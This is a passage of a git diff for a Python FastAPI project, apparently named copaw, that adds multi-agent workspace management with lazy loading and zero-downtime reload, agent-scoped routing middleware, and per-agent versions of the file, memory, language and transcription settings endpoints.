startup to verify the default agent + is properly configured. If not, it will be created. + Also ensures necessary workspace files exist (chats.json, jobs.json). + """ + config = load_config() + + # Get or determine default workspace path + if "default" in config.agents.profiles: + agent_ref = config.agents.profiles["default"] + default_workspace = Path(agent_ref.workspace_dir).expanduser() + agent_existed = True + else: + default_workspace = Path( + f"{WORKING_DIR}/workspaces/default", + ).expanduser() + agent_existed = False + + # Ensure workspace directory exists + default_workspace.mkdir(parents=True, exist_ok=True) + + # Always ensure chats.json exists (even if agent already registered) + chats_file = default_workspace / "chats.json" + if not chats_file.exists(): + with open(chats_file, "w", encoding="utf-8") as f: + json.dump( + {"version": 1, "chats": []}, + f, + ensure_ascii=False, + indent=2, + ) + logger.debug("Created chats.json for default agent") + + # Always ensure jobs.json exists (even if agent already registered) + jobs_file = default_workspace / "jobs.json" + if not jobs_file.exists(): + with open(jobs_file, "w", encoding="utf-8") as f: + json.dump( + {"version": 1, "jobs": []}, + f, + ensure_ascii=False, + indent=2, + ) + logger.debug("Created jobs.json for default agent") + + # Only update config if agent didn't exist + if not agent_existed: + logger.info("Creating default agent...") + + # Add default agent reference to config + config.agents.profiles["default"] = AgentProfileRef( + id="default", + workspace_dir=str(default_workspace), + ) + + # Set as active if no active agent + if not config.agents.active_agent: + config.agents.active_agent = "default" + + save_config(config) + logger.info( + f"Created default agent with workspace: {default_workspace}", + ) diff --git a/src/copaw/app/multi_agent_manager.py b/src/copaw/app/multi_agent_manager.py new file mode 100644 index 000000000..8b55d3f9b --- /dev/null +++ b/src/copaw/app/multi_agent_manager.py @@ -0,0 +1,311 @@ +# -*- coding: utf-8 -*- +"""MultiAgentManager: Manages multiple agent workspaces with lazy loading. + +Provides centralized management for multiple Workspace objects, +including lazy loading, lifecycle management, and hot reloading. +""" +import asyncio +import logging +from typing import Dict + +from .workspace import Workspace +from ..config.utils import load_config + +logger = logging.getLogger(__name__) + + +class MultiAgentManager: + """Manages multiple agent workspaces. + + Features: + - Lazy loading: Workspaces are created only when first requested + - Lifecycle management: Start, stop, reload workspaces + - Thread-safe: Uses async lock for concurrent access + - Hot reload: Reload individual workspaces without affecting others + """ + + def __init__(self): + """Initialize multi-agent manager.""" + self.agents: Dict[str, Workspace] = {} + self._lock = asyncio.Lock() + logger.debug("MultiAgentManager initialized") + + async def get_agent(self, agent_id: str) -> Workspace: + """Get agent workspace by ID (lazy loading). + + If workspace doesn't exist in memory, it will be created and started. + Thread-safe using async lock. + + Args: + agent_id: Agent ID to retrieve + + Returns: + Workspace: The requested workspace instance + + Raises: + ValueError: If agent ID not found in configuration + """ + async with self._lock: + # Return existing agent if already loaded + if agent_id in self.agents: + logger.debug(f"Returning cached agent: {agent_id}") + return self.agents[agent_id] + + # Load configuration to get agent reference + config = load_config() + + if agent_id not in config.agents.profiles: + raise ValueError( + f"Agent '{agent_id}' not found in configuration. " + f"Available agents: {list(config.agents.profiles.keys())}", + ) + + agent_ref = config.agents.profiles[agent_id] + + # Create and start new workspace + logger.info(f"Creating new workspace: {agent_id}") + instance = Workspace( + agent_id=agent_id, + workspace_dir=agent_ref.workspace_dir, + ) + + try: + await instance.start() + self.agents[agent_id] = instance + logger.info(f"Workspace created and started: {agent_id}") + return instance + except Exception as e: + logger.error(f"Failed to start workspace {agent_id}: {e}") + raise + + async def stop_agent(self, agent_id: str) -> bool: + """Stop a specific agent instance. + + Args: + agent_id: Agent ID to stop + + Returns: + bool: True if agent was stopped, False if not running + """ + async with self._lock: + if agent_id not in self.agents: + logger.warning(f"Agent not running: {agent_id}") + return False + + instance = self.agents[agent_id] + await instance.stop() + del self.agents[agent_id] + logger.info(f"Agent stopped and removed: {agent_id}") + return True + + async def reload_agent(self, agent_id: str) -> bool: + """Reload a specific agent instance with zero-downtime. + + This method performs a seamless reload by: + 1. Creating and fully starting a new workspace instance (no lock) + 2. Atomically replacing the old instance with the new one (with lock) + 3. Stopping the old instance after the new one is serving (no lock) + + The lock is only held during the atomic swap to minimize blocking + time for other agent operations. + + This ensures that: + - Ongoing chat requests continue using the old instance + - Other agents remain accessible during reload + - The manager stays responsive + + Args: + agent_id: Agent ID to reload + + Returns: + bool: True if agent was reloaded, False if not running + """ + # Step 1: Check if agent exists (quick check with lock) + async with self._lock: + if agent_id not in self.agents: + logger.debug( + f"Agent not running, will be loaded on next " + f"request: {agent_id}", + ) + return False + old_instance = self.agents[agent_id] + + logger.info(f"Reloading agent (zero-downtime): {agent_id}") + + # Step 2: Load configuration (outside lock) + config = load_config() + if agent_id not in config.agents.profiles: + logger.error( + f"Agent '{agent_id}' not found in configuration " + f"during reload", + ) + return False + + agent_ref = config.agents.profiles[agent_id] + + # Step 3: Create and start new workspace instance (outside lock) + # This is the slow part, but doesn't block other agents + logger.info(f"Creating new workspace instance: {agent_id}") + new_instance = Workspace( + agent_id=agent_id, + workspace_dir=agent_ref.workspace_dir, + ) + + try: + await new_instance.start() + logger.info(f"New workspace instance started: {agent_id}") + except Exception as e: + logger.exception( + f"Failed to start new workspace instance for {agent_id}: {e}", + ) + # Try to clean up the failed new instance + try: + await new_instance.stop() + except Exception: + pass # Best effort cleanup + # Old instance is still running and serving requests + return False + + # Step 4: Atomic swap (minimal lock time) + # From this point, reload is considered successful + async with self._lock: + # Double-check agent still exists + if agent_id not in self.agents: + logger.warning( + f"Agent {agent_id} was removed during reload, " + f"stopping new instance", + ) + await new_instance.stop() + return False + + # Swap instances atomically + old_instance = self.agents[agent_id] + self.agents[agent_id] = new_instance + logger.info(f"Workspace instance replaced: {agent_id}") + + # Step 5: Stop old instance (outside lock) + # If this fails, new instance is already serving, so we still succeed + try: + await old_instance.stop() + logger.info( + f"Old workspace instance stopped: {agent_id}. " + f"Zero-downtime reload completed.", + ) + except Exception as e: + logger.warning( + f"Failed to stop old workspace instance for {agent_id}: {e}. " + f"New instance is active and serving requests.", + ) + # This is not a fatal error - new instance is already active + + return True + + async def stop_all(self): + """Stop all agent instances. + + Called during application shutdown to clean up resources. + """ + logger.info(f"Stopping all agents ({len(self.agents)} running)...") + + # Create list of agent IDs to avoid modifying dict during iteration + agent_ids = list(self.agents.keys()) + + for agent_id in agent_ids: + try: + instance = self.agents[agent_id] + await instance.stop() + logger.debug(f"Agent stopped: {agent_id}") + except Exception as e: + logger.error(f"Error stopping agent {agent_id}: {e}") + + self.agents.clear() + logger.info("All agents stopped") + + def list_loaded_agents(self) -> list[str]: + """List currently loaded agent IDs. + + Returns: + list[str]: List of loaded agent IDs + """ + return list(self.agents.keys()) + + def is_agent_loaded(self, agent_id: str) -> bool: + """Check if agent is currently loaded. + + Args: + agent_id: Agent ID to check + + Returns: + bool: True if agent is loaded and running + """ + return agent_id in self.agents + + async def preload_agent(self, agent_id: str) -> bool: + """Preload an agent instance during startup. + + Args: + agent_id: Agent ID to preload + + Returns: + bool: True if successfully preloaded, False if failed + """ + try: + await self.get_agent(agent_id) + logger.info(f"Successfully preloaded agent: {agent_id}") + return True + except Exception as e: + logger.error(f"Failed to preload agent {agent_id}: {e}") + return False + + async def start_all_configured_agents(self) -> dict[str, bool]: + """Start all agents defined in configuration concurrently. + + This method loads the current configuration and starts all + configured agents in parallel for optimal performance. + + Returns: + dict[str, bool]: Mapping of agent_id to success status + """ + config = load_config() + agent_ids = list(config.agents.profiles.keys()) + + if not agent_ids: + logger.warning("No agents configured in config") + return {} + + logger.info(f"Starting {len(agent_ids)} configured agent(s)") + + async def start_single_agent(agent_id: str) -> tuple[str, bool]: + """Start a single agent with error handling.""" + try: + logger.info(f"Starting agent: {agent_id}") + await self.preload_agent(agent_id) + logger.info(f"Agent started successfully: {agent_id}") + return (agent_id, True) + except Exception as e: + logger.error( + f"Failed to start agent {agent_id}: {e}. " + f"Continuing with other agents...", + ) + return (agent_id, False) + + # Start all agents concurrently + results = await asyncio.gather( + *[start_single_agent(agent_id) for agent_id in agent_ids], + return_exceptions=False, + ) + + # Build result mapping + result_map = dict(results) + success_count = sum(1 for success in result_map.values() if success) + logger.info( + f"Agent startup complete: {success_count}/{len(agent_ids)} " + f"agents started successfully", + ) + + return result_map + + def __repr__(self) -> str: + """String representation of manager.""" + loaded = list(self.agents.keys()) + return f"MultiAgentManager(loaded_agents={loaded})" diff --git a/src/copaw/app/routers/__init__.py b/src/copaw/app/routers/__init__.py index 3035b6481..0a25fae14 100644 --- a/src/copaw/app/routers/__init__.py +++ b/src/copaw/app/routers/__init__.py @@ -1,7 +1,9 @@ # -*- coding: utf-8 -*- +"""API routers.""" from fastapi import APIRouter from .agent import router as agent_router +from .agents import router as agents_router from .config import router as config_router from .local_models import router as local_models_router from .providers import router as providers_router @@ -9,6 +11,7 @@ from .skills_stream import router as skills_stream_router from .workspace import router as workspace_router from .envs import router as envs_router +from .knowledge import router as knowledge_router from .ollama_models import router as ollama_models_router from .mcp import router as mcp_router from .tools import router as tools_router @@ -16,10 +19,11 @@ from ..runner.api import router as runner_router from .console import router as console_router from .token_usage import router as token_usage_router - +from .auth import router as auth_router router = APIRouter() +router.include_router(agents_router) router.include_router(agent_router) router.include_router(config_router) router.include_router(console_router) @@ -34,6 +38,20 @@ router.include_router(tools_router) router.include_router(workspace_router) router.include_router(envs_router) +router.include_router(knowledge_router) router.include_router(token_usage_router) +router.include_router(auth_router) + + +def create_agent_scoped_router() -> APIRouter: + """Create agent-scoped router that wraps existing routers. + + Returns: + APIRouter with all routers mounted under /agents/{agentId}/ + """ + from .agent_scoped import create_agent_scoped_router as _create + + return _create() + -__all__ = ["router"] +__all__ = ["router", "create_agent_scoped_router"] diff --git a/src/copaw/app/routers/agent.py b/src/copaw/app/routers/agent.py index 2afc9997b..fecbc7dc2 100644 --- a/src/copaw/app/routers/agent.py +++ b/src/copaw/app/routers/agent.py @@ -1,7 +1,10 @@ # -*- coding: utf-8 -*- """Agent file management API.""" -from fastapi import APIRouter, Body, HTTPException +import asyncio +import logging + +from fastapi import APIRouter, Body, HTTPException, Request from pydantic import BaseModel, Field from ...config import ( @@ -9,12 +12,83 @@ save_config, AgentsRunningConfig, ) +from ...knowledge.module_skills import sync_knowledge_module_skills from ...agents.memory.agent_md_manager import AGENT_MD_MANAGER router = APIRouter(prefix="/agent", tags=["agent"]) +def _migrate_knowledge_automation_to_running(config) -> bool: + """Compat: migrate deprecated knowledge.automation to agents.running.""" + changed = False + defaults = AgentsRunningConfig() + running = config.agents.running + legacy = getattr(config.knowledge, "automation", None) + if legacy is None: + return False + + if ( + running.knowledge_enabled == defaults.knowledge_enabled + and config.knowledge.enabled != defaults.knowledge_enabled + ): + running.knowledge_enabled = config.knowledge.enabled + changed = True + + if ( + running.knowledge_auto_collect_chat_files == defaults.knowledge_auto_collect_chat_files + and legacy.knowledge_auto_collect_chat_files != defaults.knowledge_auto_collect_chat_files + ): + running.knowledge_auto_collect_chat_files = legacy.knowledge_auto_collect_chat_files + changed = True + + if ( + running.knowledge_auto_collect_chat_urls == defaults.knowledge_auto_collect_chat_urls + and legacy.knowledge_auto_collect_chat_urls != defaults.knowledge_auto_collect_chat_urls + ): + running.knowledge_auto_collect_chat_urls = legacy.knowledge_auto_collect_chat_urls + changed = True + + if ( + running.knowledge_auto_collect_long_text == defaults.knowledge_auto_collect_long_text + and legacy.knowledge_auto_collect_long_text != defaults.knowledge_auto_collect_long_text + ): + running.knowledge_auto_collect_long_text = legacy.knowledge_auto_collect_long_text + changed = True + + if ( + running.knowledge_long_text_min_chars == defaults.knowledge_long_text_min_chars + and legacy.knowledge_long_text_min_chars != defaults.knowledge_long_text_min_chars + ): + running.knowledge_long_text_min_chars = legacy.knowledge_long_text_min_chars + changed = True + + knowledge_index = getattr(config.knowledge, "index", None) + if ( + knowledge_index is not None + and running.knowledge_chunk_size == defaults.knowledge_chunk_size + and knowledge_index.chunk_size != defaults.knowledge_chunk_size + ): + running.knowledge_chunk_size = knowledge_index.chunk_size + changed = True + + return changed + + +def _sync_running_to_knowledge_automation(config) -> None: + """Compat: keep deprecated knowledge.automation in sync.""" + legacy = getattr(config.knowledge, "automation", None) + if legacy is None: + return + running = config.agents.running + config.knowledge.enabled = running.knowledge_enabled + legacy.knowledge_auto_collect_chat_files = running.knowledge_auto_collect_chat_files + legacy.knowledge_auto_collect_chat_urls = running.knowledge_auto_collect_chat_urls + legacy.knowledge_auto_collect_long_text = running.knowledge_auto_collect_long_text + legacy.knowledge_long_text_min_chars = running.knowledge_long_text_min_chars + config.knowledge.index.chunk_size = running.knowledge_chunk_size + + class MdFileInfo(BaseModel): """Markdown file metadata.""" @@ -35,14 +109,20 @@ class MdFileContent(BaseModel): "/files", response_model=list[MdFileInfo], summary="List working files", - description="List all working files", + description="List all working files (uses active agent)", ) -async def list_working_files() -> list[MdFileInfo]: +async def list_working_files( + request: Request, +) -> list[MdFileInfo]: """List working directory markdown files.""" try: + workspace = await get_agent_for_request(request) + workspace_manager = AgentMdManager( + str(workspace.workspace_dir), + ) files = [ MdFileInfo.model_validate(file) - for file in AGENT_MD_MANAGER.list_working_mds() + for file in workspace_manager.list_working_mds() ] return files except Exception as exc: @@ -53,14 +133,19 @@ async def list_working_files() -> list[MdFileInfo]: "/files/{md_name}", response_model=MdFileContent, summary="Read a working file", - description="Read a working markdown file", + description="Read a working markdown file (uses active agent)", ) async def read_working_file( md_name: str, + request: Request, ) -> MdFileContent: """Read a working directory markdown file.""" try: - content = AGENT_MD_MANAGER.read_working_md(md_name) + workspace = await get_agent_for_request(request) + workspace_manager = AgentMdManager( + str(workspace.workspace_dir), + ) + content = workspace_manager.read_working_md(md_name) return MdFileContent(content=content) except FileNotFoundError as exc: raise HTTPException(status_code=404, detail=str(exc)) from exc @@ -72,15 +157,20 @@ async def read_working_file( "/files/{md_name}", response_model=dict, summary="Write a working file", - description="Create or update a working file", + description="Create or update a working file (uses active agent)", ) async def write_working_file( md_name: str, - request: MdFileContent, + body: MdFileContent, + request: Request, ) -> dict: """Write a working directory markdown file.""" try: - AGENT_MD_MANAGER.write_working_md(md_name, request.content) + workspace = await get_agent_for_request(request) + workspace_manager = AgentMdManager( + str(workspace.workspace_dir), + ) + workspace_manager.write_working_md(md_name, body.content) return {"written": True} except Exception as exc: raise HTTPException(status_code=500, detail=str(exc)) from exc @@ -90,14 +180,20 @@ async def write_working_file( "/memory", response_model=list[MdFileInfo], summary="List memory files", - description="List all memory files", + description="List all memory files (uses active agent)", ) -async def list_memory_files() -> list[MdFileInfo]: +async def list_memory_files( + request: Request, +) -> list[MdFileInfo]: """List memory directory markdown files.""" try: + workspace = await get_agent_for_request(request) + workspace_manager = AgentMdManager( + str(workspace.workspace_dir), + ) files = [ MdFileInfo.model_validate(file) - for file in AGENT_MD_MANAGER.list_memory_mds() + for file in workspace_manager.list_memory_mds() ] return files except Exception as exc: @@ -108,14 +204,19 @@ async def list_memory_files() -> list[MdFileInfo]: "/memory/{md_name}", response_model=MdFileContent, summary="Read a memory file", - description="Read a memory markdown file", + description="Read a memory markdown file (uses active agent)", ) async def read_memory_file( md_name: str, + request: Request, ) -> MdFileContent: """Read a memory directory markdown file.""" try: - content = AGENT_MD_MANAGER.read_memory_md(md_name) + workspace = await get_agent_for_request(request) + workspace_manager = AgentMdManager( + str(workspace.workspace_dir), + ) + content = workspace_manager.read_memory_md(md_name) return MdFileContent(content=content) except FileNotFoundError as exc: raise HTTPException(status_code=404, detail=str(exc)) from exc @@ -127,15 +228,20 @@ async def read_memory_file( "/memory/{md_name}", response_model=dict, summary="Write a memory file", - description="Create or update a memory file", + description="Create or update a memory file (uses active agent)", ) async def write_memory_file( md_name: str, - request: MdFileContent, + body: MdFileContent, + request: Request, ) -> dict: """Write a memory directory markdown file.""" try: - AGENT_MD_MANAGER.write_memory_md(md_name, request.content) + workspace = await get_agent_for_request(request) + workspace_manager = AgentMdManager( + str(workspace.workspace_dir), + ) + workspace_manager.write_memory_md(md_name, body.content) return {"written": True} except Exception as exc: raise HTTPException(status_code=500, detail=str(exc)) from exc @@ -146,10 +252,14 @@ async def write_memory_file( summary="Get agent language", description="Get the language setting for agent MD files (en/zh/ru)", ) -async def get_agent_language() -> dict: - """Get agent language setting.""" - config = load_config() - return {"language": config.agents.language} +async def get_agent_language(request: Request) -> dict: + """Get agent language setting for current agent.""" + workspace = await get_agent_for_request(request) + agent_config = load_agent_config(workspace.agent_id) + return { + "language": agent_config.language, + "agent_id": workspace.agent_id, + } @router.put( @@ -157,16 +267,19 @@ async def get_agent_language() -> dict: summary="Update agent language", description=( "Update the language for agent MD files (en/zh/ru). " - "Optionally copies MD files for the new language." + "Optionally copies MD files for the new language to agent workspace." ), ) async def put_agent_language( + request: Request, body: dict = Body( ..., description='Language setting, e.g. {"language": "zh"}', ), ) -> dict: - """Update agent language and optionally re-copy MD files.""" + """ + Update agent language and optionally re-copy MD files to agent workspace. + """ language = (body.get("language") or "").strip().lower() valid = {"zh", "en", "ru"} if language not in valid: @@ -177,36 +290,216 @@ async def put_agent_language( f"Must be one of: {', '.join(sorted(valid))}" ), ) - config = load_config() - old_language = config.agents.language - config.agents.language = language - save_config(config) + + # Get current agent's workspace + workspace = await get_agent_for_request(request) + agent_id = workspace.agent_id + + # Load agent config + agent_config = load_agent_config(agent_id) + old_language = agent_config.language + + # Update agent's language + agent_config.language = language + save_agent_config(agent_id, agent_config) copied_files: list[str] = [] if old_language != language: - from ...agents.utils import copy_md_files - - copied_files = copy_md_files(language) or [] - if copied_files: - config = load_config() - config.agents.installed_md_files_language = language - save_config(config) + # Copy MD files to agent's workspace directory + copied_files = ( + copy_md_files( + language, + workspace_dir=workspace.workspace_dir, + ) + or [] + ) return { "language": language, "copied_files": copied_files, + "agent_id": agent_id, } +@router.get( + "/audio-mode", + summary="Get audio mode", + description=( + "Get the audio handling mode for incoming voice messages. " + 'Values: "auto", "native".' + ), +) +async def get_audio_mode() -> dict: + """Get audio mode setting.""" + config = load_config() + return {"audio_mode": config.agents.audio_mode} + + +@router.put( + "/audio-mode", + summary="Update audio mode", + description=( + "Update how incoming audio/voice messages are handled. " + '"auto": transcribe if provider available, else file placeholder; ' + '"native": send audio directly to model (may need ffmpeg).' + ), +) +async def put_audio_mode( + body: dict = Body( + ..., + description='Audio mode, e.g. {"audio_mode": "auto"}', + ), +) -> dict: + """Update audio mode setting.""" + raw = body.get("audio_mode") + audio_mode = (str(raw) if raw is not None else "").strip().lower() + valid = {"auto", "native"} + if audio_mode not in valid: + raise HTTPException( + status_code=400, + detail=( + f"Invalid audio_mode '{audio_mode}'. " + f"Must be one of: {', '.join(sorted(valid))}" + ), + ) + config = load_config() + config.agents.audio_mode = audio_mode + save_config(config) + return {"audio_mode": audio_mode} + + +@router.get( + "/transcription-provider-type", + summary="Get transcription provider type", + description=( + "Get the transcription provider type. " + 'Values: "disabled", "whisper_api", "local_whisper".' + ), +) +async def get_transcription_provider_type() -> dict: + """Get transcription provider type setting.""" + config = load_config() + return { + "transcription_provider_type": ( + config.agents.transcription_provider_type + ), + } + + +@router.put( + "/transcription-provider-type", + summary="Set transcription provider type", + description=( + "Set the transcription provider type. " + '"disabled": no transcription; ' + '"whisper_api": remote Whisper endpoint; ' + '"local_whisper": locally installed openai-whisper.' + ), +) +async def put_transcription_provider_type( + body: dict = Body( + ..., + description=( + "Provider type, e.g. " + '{"transcription_provider_type": "whisper_api"}' + ), + ), +) -> dict: + """Set the transcription provider type.""" + raw = body.get("transcription_provider_type") + provider_type = (str(raw) if raw is not None else "").strip().lower() + valid = {"disabled", "whisper_api", "local_whisper"} + if provider_type not in valid: + raise HTTPException( + status_code=400, + detail=( + f"Invalid transcription_provider_type '{provider_type}'. " + f"Must be one of: {', '.join(sorted(valid))}" + ), + ) + config = load_config() + config.agents.transcription_provider_type = provider_type + save_config(config) + return {"transcription_provider_type": provider_type} + + +@router.get( + "/local-whisper-status", + summary="Check local whisper availability", + description=( + "Check whether the local whisper provider can be used. " + "Returns availability of ffmpeg and openai-whisper." + ), +) +async def get_local_whisper_status() -> dict: + """Check local whisper dependencies.""" + from ...agents.utils.audio_transcription import ( + check_local_whisper_available, + ) + + return check_local_whisper_available() + + +@router.get( + "/transcription-providers", + summary="List transcription providers", + description=( + "List providers capable of audio transcription (Whisper API). " + "Returns available providers and the configured selection." + ), +) +async def get_transcription_providers() -> dict: + """List transcription-capable providers and configured selection.""" + from ...agents.utils.audio_transcription import ( + get_configured_transcription_provider_id, + list_transcription_providers, + ) + + return { + "providers": list_transcription_providers(), + "configured_provider_id": (get_configured_transcription_provider_id()), + } + + +@router.put( + "/transcription-provider", + summary="Set transcription provider", + description=( + "Set the provider to use for audio transcription. " + 'Use empty string "" to unset.' + ), +) +async def put_transcription_provider( + body: dict = Body( + ..., + description=( + 'Provider ID, e.g. {"provider_id": "openai"} ' + 'or {"provider_id": ""} to unset' + ), + ), +) -> dict: + """Set the transcription provider.""" + provider_id = (body.get("provider_id") or "").strip() + config = load_config() + config.agents.transcription_provider_id = provider_id + save_config(config) + return {"provider_id": provider_id} + + @router.get( "/running-config", response_model=AgentsRunningConfig, summary="Get agent running config", - description="Retrieve agent runtime behavior configuration", + description="Get running configuration for active agent", ) -async def get_agents_running_config() -> AgentsRunningConfig: +async def get_agents_running_config( + request: Request, +) -> AgentsRunningConfig: """Get agent running configuration.""" config = load_config() + if _migrate_knowledge_automation_to_running(config): + _sync_running_to_knowledge_automation(config) + save_config(config) return config.agents.running @@ -214,17 +507,22 @@ async def get_agents_running_config() -> AgentsRunningConfig: "/running-config", response_model=AgentsRunningConfig, summary="Update agent running config", - description="Update agent runtime behavior configuration", + description="Update running configuration for active agent", ) async def put_agents_running_config( running_config: AgentsRunningConfig = Body( ..., description="Updated agent running configuration", ), + request: Request = None, ) -> AgentsRunningConfig: """Update agent running configuration.""" config = load_config() + previous_enabled = bool(getattr(config.agents.running, "knowledge_enabled", True)) config.agents.running = running_config + _sync_running_to_knowledge_automation(config) + if previous_enabled != running_config.knowledge_enabled: + sync_knowledge_module_skills(running_config.knowledge_enabled) save_config(config) return running_config @@ -233,28 +531,50 @@ async def put_agents_running_config( "/system-prompt-files", response_model=list[str], summary="Get system prompt files", - description="Get list of markdown files enabled for system prompt", + description="Get system prompt files for active agent", ) -async def get_system_prompt_files() -> list[str]: +async def get_system_prompt_files( + request: Request, +) -> list[str]: """Get list of enabled system prompt files.""" - config = load_config() - return config.agents.system_prompt_files + workspace = await get_agent_for_request(request) + agent_config = load_agent_config(workspace.agent_id) + return agent_config.system_prompt_files or [] @router.put( "/system-prompt-files", response_model=list[str], summary="Update system prompt files", - description="Update list of markdown files enabled for system prompt", + description="Update system prompt files for active agent", ) async def put_system_prompt_files( files: list[str] = Body( ..., - description="List of markdown filenames to load into system prompt", + description="Markdown filenames to load into system prompt", ), + request: Request = None, ) -> list[str]: """Update list of enabled system prompt files.""" - config = load_config() - config.agents.system_prompt_files = files - save_config(config) + workspace = await get_agent_for_request(request) + agent_config = load_agent_config(workspace.agent_id) + agent_config.system_prompt_files = files + save_agent_config(workspace.agent_id, agent_config) + + # Hot reload config (async, non-blocking) + # IMPORTANT: Get manager before creating background task to avoid + # accessing request object after its lifecycle ends + manager = request.app.state.multi_agent_manager + agent_id = workspace.agent_id + + async def reload_in_background(): + try: + await manager.reload_agent(agent_id) + except Exception as e: + logging.getLogger(__name__).warning( + f"Background reload failed: {e}", + ) + + asyncio.create_task(reload_in_background()) + return files diff --git a/src/copaw/app/routers/agent_scoped.py b/src/copaw/app/routers/agent_scoped.py new file mode 100644 index 000000000..f0437adb8 --- /dev/null +++ b/src/copaw/app/routers/agent_scoped.py @@ -0,0 +1,91 @@ +# -*- coding: utf-8 -*- +"""Agent-scoped router that wraps existing routers under /agents/{agentId}/ + +This provides agent isolation by injecting agentId into request.state, +allowing downstream APIs to access the correct agent context. +""" +from fastapi import APIRouter, Request +from starlette.middleware.base import ( + BaseHTTPMiddleware, + RequestResponseEndpoint, +) +from starlette.responses import Response + + +class AgentContextMiddleware(BaseHTTPMiddleware): + """Middleware to inject agentId into request.state.""" + + async def dispatch( + self, + request: Request, + call_next: RequestResponseEndpoint, + ) -> Response: + """Extract agentId from path/header and inject into context.""" + import logging + from ..agent_context import set_current_agent_id + + logger = logging.getLogger(__name__) + agent_id = None + + # Priority 1: Extract agentId from path: /api/agents/{agentId}/... + path_parts = request.url.path.split("/") + if len(path_parts) >= 4 and path_parts[1] == "api": + if path_parts[2] == "agents": + agent_id = path_parts[3] + request.state.agent_id = agent_id + logger.debug( + f"AgentContextMiddleware: agent_id={agent_id} " + f"from path={request.url.path}", + ) + + # Priority 2: Check X-Agent-Id header + if not agent_id: + agent_id = request.headers.get("X-Agent-Id") + + # Set agent_id in context variable for use by runners + if agent_id: + set_current_agent_id(agent_id) + + response = await call_next(request) + return response + + +def create_agent_scoped_router() -> APIRouter: + """Create router that wraps all existing routers under /{agentId}/ + + Returns: + APIRouter with all sub-routers mounted under /{agentId}/ + """ + from .agent import router as agent_router + from .skills import router as skills_router + from .tools import router as tools_router + from .config import router as config_router + from .mcp import router as mcp_router + from .workspace import router as workspace_router + from ..crons.api import router as cron_router + from ..runner.api import router as chats_router + from .console import router as console_router + + # Create parent router with agentId parameter + router = APIRouter(prefix="/agents/{agentId}", tags=["agent-scoped"]) + + # Include all agent-specific sub-routers (they keep their own prefixes) + # /agents/{agentId}/agent/* -> agent_router + # /agents/{agentId}/chats/* -> chats_router + # /agents/{agentId}/config/* -> config_router (channels, heartbeat) + # /agents/{agentId}/cron/* -> cron_router + # /agents/{agentId}/mcp/* -> mcp_router + # /agents/{agentId}/skills/* -> skills_router + # /agents/{agentId}/tools/* -> tools_router + # /agents/{agentId}/workspace/* -> workspace_router + router.include_router(agent_router) + router.include_router(chats_router) + router.include_router(config_router) + router.include_router(cron_router) + router.include_router(mcp_router) + router.include_router(skills_router) + router.include_router(tools_router) + router.include_router(workspace_router) + router.include_router(console_router) + + return router diff --git a/src/copaw/app/routers/agents.py b/src/copaw/app/routers/agents.py new file mode 100644 index 000000000..38963febe --- /dev/null +++ b/src/copaw/app/routers/agents.py @@ -0,0 +1,526 @@ +# -*- coding: utf-8 -*- +"""Multi-agent management API. + +Provides RESTful API for managing multiple agent instances. +""" +import asyncio +import json +import logging +from pathlib import Path +from fastapi import APIRouter, Body, HTTPException, Request +from fastapi import Path as PathParam +from pydantic import BaseModel + +from ...config.config import ( + AgentProfileConfig, + AgentProfileRef, + load_agent_config, + save_agent_config, + generate_short_agent_id, +) +from ...config.utils import load_config, save_config +from ...agents.memory.agent_md_manager import AgentMdManager +from ..multi_agent_manager import MultiAgentManager +from ...constant import WORKING_DIR + +logger = logging.getLogger(__name__) + +router = APIRouter(prefix="/agents", tags=["agents"]) + + +class AgentSummary(BaseModel): + """Agent summary information.""" + + id: str + name: str + description: str + workspace_dir: str + + +class AgentListResponse(BaseModel): + """Response for listing agents.""" + + agents: list[AgentSummary] + + +class CreateAgentRequest(BaseModel): + """Request model for creating a new agent (id is auto-generated).""" + + name: str + description: str = "" + workspace_dir: str | None = None + language: str = "en" + + +class MdFileInfo(BaseModel): + """Markdown file metadata.""" + + filename: str + path: str + size: int + created_time: str + modified_time: str + + +class MdFileContent(BaseModel): + """Markdown file content.""" + + content: str + + +def _get_multi_agent_manager(request: Request) -> MultiAgentManager: + """Get MultiAgentManager from app state.""" + if not hasattr(request.app.state, "multi_agent_manager"): + raise HTTPException( + status_code=500, + detail="MultiAgentManager not initialized", + ) + return request.app.state.multi_agent_manager + + +@router.get( + "", + response_model=AgentListResponse, + summary="List all agents", + description="Get list of all configured agents", +) +async def list_agents() -> AgentListResponse: + """List all configured agents.""" + config = load_config() + + agents = [] + for agent_id, agent_ref in config.agents.profiles.items(): + # Load agent config to get name and description + try: + agent_config = load_agent_config(agent_id) + agents.append( + AgentSummary( + id=agent_id, + name=agent_config.name, + description=agent_config.description, + workspace_dir=agent_ref.workspace_dir, + ), + ) + except Exception: # noqa: E722 + # If agent config load fails, use basic info + agents.append( + AgentSummary( + id=agent_id, + name=agent_id.title(), + description="", + workspace_dir=agent_ref.workspace_dir, + ), + ) + + return AgentListResponse( + agents=agents, + ) + + +@router.get( + "/{agentId}", + response_model=AgentProfileConfig, + summary="Get agent details", + description="Get complete configuration for a specific agent", +) +async def get_agent(agentId: str = PathParam(...)) -> AgentProfileConfig: + """Get agent configuration.""" + try: + agent_config = load_agent_config(agentId) + return agent_config + except ValueError as e: + raise HTTPException(status_code=404, detail=str(e)) from e + except Exception as e: + raise HTTPException(status_code=500, detail=str(e)) from e + + +@router.post( + "", + response_model=AgentProfileRef, + status_code=201, + summary="Create new agent", + description="Create a new agent (ID is auto-generated by server)", +) +async def create_agent( + request: CreateAgentRequest = Body(...), +) -> AgentProfileRef: + """Create a new agent with auto-generated ID.""" + config = load_config() + + # Always generate a unique short UUID (6 characters) + max_attempts = 10 + new_id = None + for _ in range(max_attempts): + candidate_id = generate_short_agent_id() + if candidate_id not in config.agents.profiles: + new_id = candidate_id + break + + if new_id is None: + raise HTTPException( + status_code=500, + detail="Failed to generate unique agent ID after 10 attempts", + ) + + # Create workspace directory + workspace_dir = Path( + request.workspace_dir or f"{WORKING_DIR}/workspaces/{new_id}", + ).expanduser() + workspace_dir.mkdir(parents=True, exist_ok=True) + + # Build complete agent config with generated ID + from ...config.config import ( + ChannelConfig, + MCPConfig, + HeartbeatConfig, + ToolsConfig, + ) + + agent_config = AgentProfileConfig( + id=new_id, + name=request.name, + description=request.description, + workspace_dir=str(workspace_dir), + language=request.language, + channels=ChannelConfig(), + mcp=MCPConfig(), + heartbeat=HeartbeatConfig(), + tools=ToolsConfig(), + ) + + # Initialize workspace with default files + _initialize_agent_workspace(workspace_dir, agent_config) + + # Save agent configuration to workspace/agent.json + agent_ref = AgentProfileRef( + id=new_id, + workspace_dir=str(workspace_dir), + ) + + 